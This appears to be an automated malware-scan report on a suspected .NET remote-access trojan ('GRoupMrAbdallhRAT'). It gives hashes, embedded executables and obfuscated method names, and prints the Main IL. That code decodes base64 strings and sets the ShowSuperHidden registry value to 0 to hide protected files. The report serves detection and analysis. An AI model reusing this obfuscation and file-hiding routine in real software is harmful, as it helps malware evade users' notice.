Suspicious
Suspect

5e8c000f5f5edc2a912d7f14a963182b

PE Executable | MD5: 5e8c000f5f5edc2a912d7f14a963182b | Size: 2.79 MB | application/x-dosexec


Characteristics

Symbol Obfuscation Score: High

Hash
MD5: 5e8c000f5f5edc2a912d7f14a963182b
SHA1: 5eacba2d117350cd3795b5007e8a04ef8366894f
SHA256: 5228cdea84a04c9047fd321efcde0b729a7b2fb036328f8c68c4379ea50c9f9a
SHA384: 1769349fb3a1a46bf54d776f4276187dd853570d12692a0f17f19743b9cada5378908e8374646113a4903b47370a4b90
SHA512: a6e5754aea2bb20a6554dd5737a00c7cf084045155ccd387fa80d7897b2c40721988ca7944a60ce970f13bcefd95058877d26bda9b8c637740dd0b33a4bc67b9
SSDeep: 49152:035n+Docm65+Jg0ZLXVZGIOBL1oayyi3Ccy1OD8E86wlzCHoc3+1NW:03A1mq+jZOIOBLaayyidFkleI9I
TLSH: 53D5B76AE3B1B319D9ED74F13D41AE3A0A6C18B5AB3813A7CD85F2034657C78A07E513

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
ID:0-preview.png
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ynrkw.Resources
MRABDALLH.exe
playit.exe
Informations
Info: PE Detect: PeReader OK (file layout)
Module Name: GRoupMrAbdallhRAT
Full Name: GRoupMrAbdallhRAT
EntryPoint: System.Void Program::सकक ्दसाशरहक् श दतमह()
Scope Name: GRoupMrAbdallhRAT
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: playit
Assembly Version: 0.16.3.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 19
Main Method: System.Void Program::सकक ्दसाशरहक् श दतमह()
Main IL Instruction Count: 49

Main IL

ldc.i4 2000
call System.Void System.Threading.Thread::Sleep(System.Int32)
call System.Boolean Program::हशूशमबरसलसकदराहशेसमद()
brtrue IL_001E: call System.Void Program::बसबकब लमदहश शलेहहरह ()
call System.Int32 System.Environment::get_ExitCode()
call System.Void System.Environment::Exit(System.Int32)
call System.Void Program::बसबकब लमदहश शलेहहरह ()
call My.MyComputer My.MyProject::शलदह रह हमअूसअेहअाीह()
callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry()
callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser()
nop
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cRXhwbG9yZXJcQWR2YW5jZWQ=
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
ldc.i4.1
callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean)
stloc.0
ldloc.0
nop
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr U2hvd1N1cGVySGlkZGVu
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String)
ldc.i4.1
box System.Int32
ldc.i4.0
call System.Boolean Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(System.Object,System.Object,System.Boolean)
brfalse IL_009B: leave IL_00B1
ldloc.0
nop
call System.Text.Encoding System.Text.Encoding::get_UTF8()
ldstr U2hvd1N1cGVySGlkZGVu
call System.Byte[] System.Convert::FromBase64String(System.String)
callvirt System.String System.Text.Encoding::GetString(System.Byte[])
ldc.i4.0
box System.Int32
callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object)
leave IL_00B1: ldnull
dup
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception)
stloc.1
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
leave IL_00B1: ldnull
ldnull
call System.Object Program::लक त देर हततशलरबसम्(System.Object)
pop
ret
